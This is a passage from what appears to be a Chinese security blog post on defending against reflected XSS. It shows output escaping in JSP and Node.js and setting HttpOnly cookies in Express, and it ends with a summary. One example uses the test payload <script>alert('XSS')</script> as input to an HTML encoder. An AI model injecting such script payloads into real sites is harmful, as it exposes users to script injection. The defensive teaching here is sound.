<figure class="highlight jsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ taglib uri=<span class="string">&quot;http://java.sun.com/jsp/jstl/functions&quot;</span> prefix=<span class="string">&quot;fn&quot;</span> %&gt;</span><br><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line"></span><br><span class="line">&lt;body&gt;</span><br><span class="line">    &lt;p&gt;$&#123;fn:escapeXml(param.userInput)&#125;&lt;/p&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line"></span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<ul>
<li><strong>Node.js（使用 EJS 模板引擎）</strong>：EJS 会自动对 <code>&lt;%= %&gt;</code> 输出的内容进行 HTML 转义，如果需要更精细控制，也可以手动使用 <code>ejs.escapeFunction</code> 或者第三方库（如 <code>he</code> 库）。例如使用 <code>he</code> 库进行编码：</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> he = <span class="built_in">require</span>(<span class="string">&#x27;he&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> userInput = <span class="string">&quot;&lt;script&gt;alert(&#x27;XSS&#x27;)&lt;/script&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">const</span> escapedInput = he.<span class="title function_">encode</span>(userInput);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(escapedInput);</span><br></pre></td></tr></table></figure>

<h3 id="（三）设置-HttpOnly-Cookie"><a href="#（三）设置-HttpOnly-Cookie" class="headerlink" title="（三）设置 HttpOnly Cookie"></a>（三）设置 HttpOnly Cookie</h3><p>在服务器端设置 cookie 时，添加 <code>HttpOnly</code> 属性。带有 <code>HttpOnly</code> 属性的 cookie ，无法通过 JavaScript 脚本获取，这样可以有效防止攻击者通过反射型 XSS 窃取用户的 cookie 。以 Node.js（Express 框架）为例，设置 <code>HttpOnly</code> cookie 的代码如下：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> express = <span class="built_in">require</span>(<span class="string">&#x27;express&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> app = <span class="title function_">express</span>();</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">&#x27;/set-cookie&#x27;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    res.<span class="title function_">cookie</span>(<span class="string">&#x27;sessionId&#x27;</span>, <span class="string">&#x27;1234567890&#x27;</span>, &#123;</span><br><span class="line">        <span class="attr">httpOnly</span>: <span class="literal">true</span>,</span><br><span class="line">        <span class="attr">secure</span>: <span class="literal">true</span>, <span class="comment">// 建议在生产环境结合 HTTPS 使用</span></span><br><span class="line">        <span class="attr">maxAge</span>: <span class="number">3600000</span> <span class="comment">// cookie 有效期，单位毫秒</span></span><br><span class="line">    &#125;);</span><br><span class="line">    res.<span class="title function_">send</span>(<span class="string">&#x27;Cookie 设置成功&#x27;</span>);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">listen</span>(<span class="number">3000</span>, <span class="function">() =&gt;</span> &#123;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;服务器已启动，端口 3000&#x27;</span>);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<h2 id="五、总结"><a href="#五、总结" class="headerlink" title="五、总结"></a>五、总结</h2><p>反射型 XSS 利用网站对用户输入和输出处理的不严谨，实现恶意脚本的执行，给用户和网站带来诸多安全隐患。通过采取输入验证、输出编码以及设置 <code>HttpOnly</code> cookie 等防护措施，可以有效降低反射型 XSS 攻击的风险。在实际的 Web 开发过程中，开发者应从前端到后端，全面考虑安全防护，构建稳固的安全防线，保障用户数据和网站的安全运行 。同时，对于普通用户而言，也要提高安全意识，不随意点击来源不明的链接，共同维护网络环境的安全。 </p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="reward-container">
  <div>请我一杯咖啡吧！</div>
  <button>
    赞赏
  </button>
  <div class="post-reward">
      <div>
        <img src="/images/wechatpay.png" alt="子非鱼 微信">
        <span>微信</span>
      </div>
      <div>
        <img src="/images/alipay.png" alt="子非鱼 支付宝">
        <span>支付宝</span>
      </div>

  </div>
</div>

          <div class="post-tags">
              <a href="/tags/Web/" rel="tag"># Web</a>
              <a href="/tags/XSS/" rel="tag"># XSS</a>
              <a href="/tags/%E5%8F%8D%E5%B0%84%E6%80%A7XSS/" rel="tag"># 反射性XSS</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/08/06/Web%E6%BC%8F%E6%B4%9E/Sql%E6%B3%A8%E5%85%A5/%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8/" rel="prev" title="时间盲注">
                  <i class="fa fa-angle-left"></i> 时间盲注
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/08/06/Web%E6%BC%8F%E6%B4%9E/XSS%E6%BC%8F%E6%B4%9E/%E5%AD%98%E5%82%A8%E5%9E%8Bxss/" rel="next" title="存储型xss">
                  存储型xss <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">子非鱼</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
